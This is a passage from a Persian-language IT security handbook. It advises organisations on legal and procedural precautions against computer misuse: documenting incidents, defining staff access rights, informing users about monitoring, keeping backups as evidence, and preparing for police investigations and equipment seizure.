ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻧﺴﺨﺔ ﭼﺎﭘﻲ ﺗﻬﻴﻪ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺿﻤﻴﻤﺔ ﻳﺎﺩﺩﺍﺷﺘﻬﺎﻳﺘﺎﻥ ﻛﻨﻴﺪ.
ﻫﻨﮕﺎﻡ ﺍﻧﺠﺎﻡ ﺑﺎﺯﺭﺳﻴﻬﺎ ﻭ ﺗﺤﻘﻴﻘﺎﺕ ،ﻭﺟـﻮﺩ ﻳـﻚ ﺳـﺎﺑﻘﺔ
ﻛﺘﺒﻲ ﺍﺯ ﺍﺗﻔﺎﻗﺎﺗﻲ ﻛﻪ ﺭﺥ ﺩﺍﺩﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﺴﻴﺎﺭ ﺍﺭﺯﺷـﻤﻨﺪ
ﺑﺎﺷﺪ .ﺯﻣﺎﻥ ﻭ ﻣﻮﺿﻮﻉ ﻛﻠﻴﺔ ﺗﻤﺎﺳﻬﺎ ﺑﺎ ﻣﺮﺍﺟﻊ ﻗـﺎﻧﻮﻧﻲ ﺭﺍ
ﻧﻴﺰ ﺑﻪ ﺛﺒﺖ ﺑﺮﺳﺎﻧﻴﺪ.
ﺑﺮﺍﻱ ﺑﻬﺒﻮﺩ ﻗﻮﺍﻧﻴﻦ ﻓﻌﻠﻲ ﺗﻼﺵ ﻧﺎﭼﻴﺰﻱ ﺧﻮﺍﻫﺪ ﺷـﺪ؛ ﻭ ﺟﺎﻣﻌـﻪ
ﻧﻴﺰ ﺑﻪ ﻣﻮﺿﻮﻋﺎﺗﻲ ﺍﺯ ﺍﻳﻦ ﻗﺒﻴﻞ ﺗﻮﺟﻪ ﻛﻤﺘﺮﻱ ﻧﺸﺎﻥ ﺧﻮﺍﻫﺪ ﺩﺍﺩ؛
ﻭ ﺧﻼﺻﻪ ﺍﻳﻨﻜﻪ ﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ ﻛـﻪ ﻣﺤـﻴﻂ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﺑﺮﺍﻱ ﻫﻤﺔ ﺑﺎﺯﻳﮕﺮﺍﻥ ﺁﻥ ﺧﻄﺮﻧﺎﻛﺘﺮ ﺍﺯ ﺁﻧﭽﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑﻨﻈـﺮ
ﺑﻴﺎﻳﺪ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺍﺣﺘﻴﺎﻁ ﺑﻴﺸﺘﺮ...
•
ﺑﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧﻮﺩ ﺻﺮﺍﺣﺘﹰﺎ ﮔﻮﺷﺰﺩ ﻛﻨﻴﺪ ﻛﻪ ﻣﻠﺰﻡ ﻫﺴﺘﻨﺪ
ﺩﺭ ﭘﺎﻳﺎﻥ ﻛﺎﺭﺷﺎﻥ ﻭ ﻳﺎ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺧﻮﺍﺳﺘﻪ ﺷـﺪ
ﻛﻠﻴﺔ ﻣﻨﺎﺑﻌﻲ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭﺷﺎﻥ ﺑﻮﺩﻩ )ﻣﺜﻞ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ
ﻛﺘﺎﺑﭽﻪﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ( ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﻨﺪ.
•
ﺍﮔﺮ ﺍﺗﻔـﺎﻗﻲ ﺭﺥ ﺩﺍﺩﻩ ﻛـﻪ ﺑﻨﻈـﺮ ﺷـﻤﺎ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ
ﭘﻠﻴــﺴﻲ ﺭﺍ ﻻﺯﻡ ﻣــﻲﻛﻨــﺪ ،ﺍﺟــﺎﺯﻩ ﻧﺪﻫﻴــﺪ ﻛﺎﺭﻛﻨــﺎﻥ ﺑــﻪ
ﺗﺤﻘﻴﻘــﺎﺕ ﺧﻮﺩﺳــﺮﺍﻧﻪ ﺑﭙﺮﺩﺍﺯﻧــﺪ .ﺗﻼﺷــﻬﺎﻱ ﺧﻮﺩﺳــﺮﺍﻧﻪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﺑﻌﻀﻲ ﻣﺪﺍﺭﻙ ﺩﺭ ﺑﺎﺯﺭﺳـﻴﻬﺎﻱ
ﺭﺳﻤﻲ ﺳﻨﺪﻳﺖ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ
ﺍﺳﺖ ﺑﺎﺯﺭﺳﺎﻥ ﺑﺎ ﻣـﺸﺎﻫﺪﺓ ﺩﺧﺎﻟـﺖ ﺷـﻤﺎ ﺩﺭ ﺗﺤﻘﻴﻘـﺎﺕ،
ﻧﺴﺒﺖ ﺑﻪ ﺷﻤﺎ ﺩﻳﺪ ﻣﻨﻔﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ.
•
ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ ﺍﻣـﻀﺎﻱ ﺗﻮﺍﻓﻘﻨﺎﻣـﻪﺍﻱ ﺩﺭ ﺯﻣﻴﻨـﺔ
ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻳــﺸﺎﻥ ﺩﺭ ﻗﺒــﺎﻝ ﺍﻃﻼﻋــﺎﺕ ﺣــﺴﺎﺱ ،ﻛــﺎﺭﺑﺮﺩ
ﺭﺍﻳﺎﻧﻪ ،ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻭ ﺩﻳﮕـﺮ ﻣـﺴﺎﺋﻞ
ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑﻌـﺪﻫﺎ ﻣﻄـﺮﺡ ﺷـﻮﻧﺪ ﻣﻠـﺰﻡ
ﻧﻤﺎﻳﻴﺪ .ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺳﻴﺎﺳـﺘﻬﺎ ﺻـﺮﻳﺢ ﻭ
ﻋﺎﺩﻻﻧﻪ ﻫﺴﺘﻨﺪ ﻭ ﻫﻤﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﺯ ﺁﻥ ﺁﮔـﺎﻫﻲ ﺩﺍﺭﻧـﺪ ﻭ
ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﺍﻣﻀﺎ ﻛﺮﺩﻩ ﺍﻧﺪ .ﺗﺼﺮﻳﺢ ﻛﻨﻴـﺪ ﻛـﻪ
ﻛﻠﻴﺔ ﺩﺳﺘﺮﺳﻴﻬﺎ ﻭ ﺣﻘﻮﻕ ﺩﺳﺘﺮﺳﻲ ﻫﻨﮕﺎﻡ ﭘﺎﻳـﺎﻥﻳـﺎﻓﺘﻦ
ﺩﻭﺭﺓ ﻛﺎﺭﻱ ﭘﺎﻳﺎﻥ ﻣﻲﻳﺎﺑﺪ ﻭ ﻫﺮﮔﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠـﺎﺯ
ﺩﺭ ﺧﻼﻝ ﻳﺎ ﭘـﺲ ﺍﺯ ﭘﺎﻳـﺎﻥ ﺩﻭﺭﺓ ﻛـﺎﺭﻱ ﺗﺤـﺖ ﭘﻴﮕـﺮﺩ
ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ.
ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ
ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺍﺣﺘﻤﺎﻟﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ:
•
ﺩﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ ،ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ
ﺣﻖ ﻧـﺴﺨﻪ ﺑـﺮﺩﺍﺭﻱ ﻭ ﻣﺎﻟﻜﻴـﺖ ﺍﻧﺤـﺼﺎﺭﻱ ﺧـﻮﺩ ﺭﺍ ﺩﺭ
ﺍﺑﺘﺪﺍﻳﻲﺗﺮﻳﻦ ﺑﺨﺶ ﻫﺮﻳﻚ ﺍﺯ ﻓﺎﻳﻠﻬـﺎ ﻗـﺮﺍﺭ ﺩﻫﻴـﺪ .ﺍﮔـﺮ
ﺻﺮﺍﺣﺘﹰﺎ ﺑﻪ ﺣﻖ ﻧﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩﻩﺍﻳـﺪ ،ﺣﺘﻤـﹰﺎ
ﺍﻣﻜﺎﻥ ﭘﺮﻛﺮﺩﻥ ﻳﻚ ﻓﺮﻡ ﻣﺨﺼﻮﺹ ﺩﺭ ﻫﻤﻴﻦ ﺭﺍﺑﻄـﻪ ﺭﺍ
ﺑﺮﺍﻱ ﻫﺮ ﻣﺸﺘﺮﻱ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻴﺪ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ
ﺑﻪ ﺑﺎﺯﺭﺳﻲ ﺩﻗﻴﻖﺗﺮ ﻭ ﺗﺮﻣﻴﻢ ﺧﺴﺎﺭﺗﻬﺎ ﻛﻤﻚ ﻛﻨﺪ.
•
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻـﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﺭﺑـﺎﺭﺓ ﺑﺎﻳـﺪﻫﺎ ﻭ
ﻧﺒﺎﻳﺪﻫﺎﻱ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺧﻮﺩ ﺁﮔﺎﻫﻲ ﻛﺎﻣﻞ ﺩﺍﺭﻧﺪ.
•
ﺗﻤﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺍﺯ ﻫﺮ ﭼﻴﺰﻱ ﻛﻪ ﺩﺭ ﺷﺒﻜﺔ ﺷـﻤﺎ ﺗﺤـﺖ
ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻣﻄﻠﻊ ﻛﻨﻴﺪ )ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺑـﺎ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺷﻤﺎ ﻧﻘﺾ ﻧﻤﻲ ﺷﻮﺩ( .ﺍﻳﻦ ﻧﻈﺎﺭﺕ ﻣﻲ ﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ
ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﻓﺸﺮﺩﻩﺷﺪﻥ ﻛﻠﻴﺪﻫﺎ ،ﻭ ﺩﺳﺘﺮﺳـﻲ
ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺷﻮﺩ .ﭼﻨﺎﻧﭽﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻧﻈﺎﺭﺕ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ
ﻧﺸﻮﺩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻈﺎﺭﺕ ﺑﺮ ﻛﺎﺭﻫﺎﻱ ﻳﻚ ﻣﻬﺎﺟﻢ ﻫـﻢ
ﺑﻌﻨﻮﺍﻥ ﻧﻘﺾ ﻗﻮﺍﻧﻴﻦ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺗﻠﻘﻲ ﺷﻮﺩ.
•
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺧـﻮﺏ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ ﻭ ﺍﺯ ﺁﻧﻬـﺎ ﺩﺭ
ﺟﺎﻱ ﺍﻣﻨﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ .ﺍﮔـﺮ ﺑـﺮﺍﻱ ﻛـﺸﻒ ﺣﻘﻴﻘـﺖ
ﻻﺯﻡ ﺍﺳﺖ ﺍﻳﻦ ﻧﺴﺨﻪﻫﺎ ﺭﺍ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻮﺭﺩ ﻣﻘﺎﻳﺴﻪ ﻗﺮﺍﺭ
ﺩﻫﻴﺪ ﺑﺎﻳﺪ ﻗﺎﺩﺭ ﺑﺎﺷﻴﺪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﻪ ﻧﺴﺨﻪﻫﺎ ﺩﺳﺘﺮﺳـﻲ
ﺩﺍﺷﺘﻪﺍﻧﺪ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﺎﻳﻴﺪ .ﻧﮕﻬـﺪﺍﺭﻱ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺭ
ﻣﺤﻴﻄﻬﺎﻱ ﻋﻤﻮﻣﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﻌﺪﻫﺎ ﻧﺘـﻮﺍﻥ ﺍﺯ ﺁﻧﻬـﺎ
ﺑﻌﻨﻮﺍﻥ ﻣﺪﺭﻙ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
•
ﺩﺭﺻﻮﺭﺕ ﻣﺸﺎﻫﺪﺓ ﻫﺮﮔﻮﻧﻪ ﻣﻮﺭﺩ ﻣﺸﻜﻮﻙ ﻳﺎ ﺍﺗﻔﺎﻗﻲ ﻛﻪ
ﻧﻴﺎﺯ ﺑﻪ ﺩﺧﺎﻟﺖ ﻣﺮﺍﺟﻊ ﻗﻀﺎﻳﻲ ﺩﺍﺭﺩ ،ﻳﺎﺩﺩﺍﺷـﺖﺑـﺮﺩﺍﺭﻱ ﺭﺍ
ﺷﺮﻭﻉ ﻛﻨﻴﺪ .ﻣﺸﺎﻫﺪﺍﺕ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﻭ ﺯﻣﺎﻥ ﻫﺮﻳﻚ
ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻳﺎﺩﺩﺍﺷﺖ ﻧﻤﺎﻳﻴﺪ .ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻭ ﺭﺩﮔﻴﺮﻱﻫﺎ
ﺑﺨﺶ ﺳﻮﻡ
•
ﺳﻌﻲ ﻛﻨﻴﺪ ﺳﻄﻮﺡ ﺍﺧﺘﻴﺎﺭﺍﺕ ﻛﻠﻴﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ
ﺑﺼﻮﺭﺕ ﻛﺘﺒﻲ ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ ﻭ ﻫﺮﺁﻧﭽﻪ ﻛـﻪ ﻓـﺮﺩ ﺑـﻪ ﺁﻥ
ﺩﺳﺘﺮﺳﻲ ﻗﺎﻧﻮﻧﻲ ﺩﺍﺭﺩ )ﻭ ﻧﻴﺰ ﻫﺮﭼﻪ ﻛﻪ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺭﺩ(
ﺭﺍ ﺩﺭ ﺍﻳﻦ ﺗﻌﺎﺭﻳﻒ ﺑﻴﺎﻭﺭﻳﺪ .ﺑﺮﺍﻱ ﺍﺑﻼﻍ ﺍﻳـﻦ ﺗﻌـﺎﺭﻳﻒ ﺑـﻪ
ﺍﻓﺮﺍﺩ ﺳﺎﺯ ﻭ ﻛﺎﺭﻱ ﺑﻴﺎﻧﺪﻳﺸﻴﺪ ﻛﻪ ﻫﺮ ﻛﺲ ﺑﺘﻮﺍﻧﺪ ﺑﺨـﻮﺑﻲ
ﺁﻧﺮﺍ ﺑﻔﻬﻤﺪ ﻭ ﺑﻪ ﻛﺎﺭ ﺑﺒﻨـﺪﺩ ،ﻭ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ ﺣﺎﺻـﻞ ﺍﺯ
ﺁﻧﺮﺍ ﻧﻴﺰ ﺩﺭﻙ ﻛﻨﺪ.
١٨٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﺨﺎﻃﺮﺍﺕ ﺟﻨﺎﻳﻲ ﺩﺭ ﺣﻮﺯﺓ ﺗﺠﺎﺭﺕ
ﺍﮔﺮ ﺷﻤﺎ ﻳﻚ ISPﻫﺴﺘﻴﺪ ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻭ ﻳﺎ ﺑﻪ ﻫﺮ ﺻﻮﺭﺗﻲ ﺩﺭ
ﻣﺤﻞ ﻛﺎﺭ ﺧـﻮﺩ ﺷـﺒﻜﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺍﺭﻳـﺪ ،ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺍﺯ
ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻧﺎﺩﺭﺳﺖ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺧﻮﺩﺗـﺎﻥ
ﺗﺤﺖ ﺗﻌﻘﻴﺐ ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ.
ﺍﮔﺮ ﻣﻘﺎﻣﺎﺕ ﻗﻀﺎﻳﻲ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺑﺮﺳﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﻤﺎ
ﺗﻮﺳﻂ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺩﻳﮕـﺮ ،ﺍﻧﺘﻘـﺎﻝ ﻭ
ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﻃﺒﻘﻪ ﺑﻨـﺪﻱ ﺷـﺪﻩ )ﺍﻋـﻢ ﺍﺳـﺮﺍﺭ ﺗﺠـﺎﺭﻱ ،ﺗـﺼﺎﻭﻳﺮ
ﻣﺴﺘﻬﺠﻦ ﻛﻮﺩﻛﺎﻥ ،ﻭ (...ﻳـﺎ ﻫﻤﻜـﺎﺭﻱ ﺩﺭ ﺟـﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﺣﻜـﻢ
ﺗﻮﻗﻴﻒ ،ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳـﻴﻬﺎ ﻣـﺼﺎﺩﺭﻩ ﺷـﻮﻧﺪ .ﺍﮔـﺮ ﺩﺭ ﺧـﻼﻝ
ﺗﺤﻘﻴﻖ ﺑﺘﻮﺍﻧﻴﺪ ﺛﺎﺑﺖ ﻛﻨﻴﺪ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺁﻥ ﻛﺎﺭﻣﻨﺪ ﺑـﻪ ﺳﻴـﺴﺘﻢ
ﺷﻤﺎ ﻣﺤﺪﻭﺩ ﺑﻮﺩﻩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﻳﺮﺓ ﺍﻳﻦ ﺗﻮﻗﻴﻒﻫﺎ ﻛﺎﻫﺶ ﭘﻴﺪﺍ
ﻛﻨﺪ ،ﺍﻣﺎ ﺑﺎﺯ ﻫﻢ ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﺑﺨﺸﻲ ﺍﺯ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺷﻤﺎ ﻃـﻲ
ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺭﺳﻤﻲ ﺩﺭ ﺗﻮﻗﻴﻒ ﺑﺎﻗﻲ ﺧﻮﺍﻫﻨﺪ ﻣﺎﻧﺪ.
ﺑﺴﺘﻪ ﺑﻪ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﭘﺬﻳﺮﻓﺘﻪﺷﺪﻩ ﺩﺭ ﺳﻴﺴﺘﻢ ﻗﺎﻧﻮﻧﻲ ﻫﺮ ﻛﺸﻮﺭ،
ﺍﮔﺮ ﭘﻠﻴﺲ ﻣﺤﻠﻲ ﻳﺎ ﻣﻘﺎﻣﺎﺕ ﻛـﺸﻮﺭﻱ ﻣﻌﺘﻘـﺪ ﺑﺎﺷـﻨﺪ ﻣـﺪﺍﺭﻛﻲ
ﻣﺒﻨﻲ ﺑﺮ ﺗﺨﻄﻲ ﺍﺯ ﻗﺎﻧﻮﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﻳـﻚ ﻗﺎﺿـﻲ ﺗﻘﺎﺿـﺎﻱ
ﻣﺠﻮﺯ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻖ ﻣﻲﻛﻨﻨﺪ ﻭ ﻗﺎﺿﻲ ﻧﻴﺰ ﺣﻜـﻢ ﺗﺤﻘﻴـﻖ
ﺻــﺎﺩﺭ ﻣــﻲﻧﻤﺎﻳــﺪ .ﺩﺭ ﺳــﺎﻟﻬﺎﻱ ﺍﺧﻴــﺮ ﺗﻌــﺪﺍﺩﻱ ﺍﺯ ﺑﺎﺯﺭﺳــﺎﻥ ﻭ
ﻣﺴﺌﻮﻻﻥ ﻛﺸﻮﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ،ﺩﺭ ﺑﺮﺧﻲ ﺍﻳﺎﻟﺘﻬﺎ ﺟﺎﻳﮕﺎﻫﻲ ﺭﺍ
ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﮔﺴﺘﺮﺩﻩ ﻭ ﺳﻨﮕﻴﻦ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﻧﺪ .ﻳـﻚ
ﺩﻟﻴﻞ ﺍﻳﻦ ﺍﻣﺮ ،ﻋﺪﻡ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﺩﻭﺍﻳـﺮ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﺑـﺮﺍﻱ
ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻨﻈـﺮ ﻣـﻲﺭﺳـﺪ ﺑـﺎ ﺍﻧﺠـﺎﻡ
ﺍﻳﻨﻜﺎﺭ ﻭ ﻧﻴﺰ ﻛﺎﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ،ﺑﻪ ﻣﺮﻭﺭ ﺯﻣﺎﻥ ﺑﻬﺘﺮ ﺷﻮﺩ.
ﺍﺣﺘﻴﺎﻁ ﺑﻴﺸﺘﺮ...
•
ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺑـﺮ ﺷـﺒﻜﻪ ﻭ ﻧﻈـﺎﺭﺕ ﺑـﺮ
ﺻﻔﺤﻪﻛﻠﻴﺪ ﻣﺠﻬﺰ ﻛﻨﻴﺪ .ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮ
ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺳﺘﺎﺩﻩﺷﺪﻩ ﻳﺎ ﺩﺭﻳﺎﻓﺖﺷﺪﻩ ﻧﻈﺎﺭﺕ ﻛﻨﻨﺪ
ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺿﺒﻂ ﻧﻤﺎﻳﻨﺪ .ﺍﮔﺮ ﺍﺣـﺴﺎﺱ ﻛﺮﺩﻳـﺪ ﻛـﻪ ﻣـﻮﺭﺩ
ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ﺳﺮﻳﻌﹰﺎ ﻋﻤﻠﻴـﺎﺕ ﻧﻈـﺎﺭﺕ ﻭ ﺿـﺒﻂ ﺭﺍ
ﺁﻏﺎﺯ ﻛﻨﻴﺪ ﻭ ﻣﻨﺘﻈﺮ ﺣﻜﻢ ﺩﺍﺩﮔﺎﻩ ﻧﺒﺎﺷﻴﺪ؛ ﭼﺮﺍﻛﻪ ﻧﻴﺮﻭﻫﺎﻱ
ﻻ ﺑﺪﻭﻥ ﻛﺴﺐ ﺍﺟﺎﺯﻩ ﺍﺯ ﺩﺍﺩﮔﺎﻩ ﻧﻤﻲﺗﻮﺍﻧﻨـﺪ
ﺍﻧﺘﻈﺎﻣﻲ ﻣﻌﻤﻮ ﹰ
ﺑﻪ ﺷﻤﺎ ﻣﺠﻮﺯﻱ ﺑﺪﻫﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺑﻌﻨﻮﺍﻥ ﻣﺠﺮﻱ ﻗﺎﻧﻮﻥ
ﻋﻤﻞ ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭﻳﺎﻓﺖ ﺣﻜـﻢ ﻗﺎﺿـﻲ ﻣﺒﻨـﻲ ﺑـﺮ ﺍﺟـﺎﺯﺓ
ﺩﺍﺩﮔﺎﻩ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺪﺗﻬﺎ ﺑﻪ ﻃﻮﻝ ﺑﻴﺎﻧﺠﺎﻣﺪ.
•
ﺑﺎ ﻛﻤـﻚ ﻭﻛﻴـﻞ ﻭ ﺷـﺮﻛﺖ ﺑﻴﻤـﺔ ﺧـﻮﺩ ﺑـﺮﺍﻱ ﻛﺎﺭﻫـﺎ،
ﺗﺤﻘﻴﻘﺎﺕ ﻣﺮﺗﺒﻂ ،ﻭ ﻫﺮ ﻓﻌﺎﻟﻴﺖ ﻣﺮﺑﻮﻁ ﻛﻪ ﺑﺎﻳـﺪ ﻫﻨﮕـﺎﻡ
ﻭﻗﻮﻉ ﻳﻚ ﻧﻔﻮﺫ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻗﺘﻀﺎﺋﻲ ﺗﺪﻭﻳﻦ
ﻛﻨﻴﺪ.
•
ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺠﺮﻳﺎﻥ ﻗـﺎﻧﻮﻥ ﻛـﻪ ﺷﺎﻳـﺴﺘﮕﻲ ﺩﺍﺭﻧـﺪ ﺭﻭﻱ
ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﻩ ﺗﺤﻘﻴﻖ ﻛﻨﻨﺪ ﺭﺍ ﻣـﻮﺭﺩ ﺷﻨﺎﺳـﺎﻳﻲ ﻗـﺮﺍﺭ
ﺩﻫﻴﺪ؛ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻳﺸﺎﻥ ﻣﻌﺮﻓﻲ ﻛﻨﻴﺪ ،ﻭ ﻧﮕﺮﺍﻧﻴﻬﺎﻳﺘـﺎﻥ ﺭﺍ
ﭘﻴﺶ ﺍﺯ ﻭﻗﻮﻉ ﺣﺎﺩﺛﻪ ﺑﺎ ﺁﻧﻬﺎ ﺩﺭ ﻣﻴﺎﻥ ﺑﮕﺬﺍﺭﻳـﺪ .ﭼﻨﺎﻧﭽـﻪ
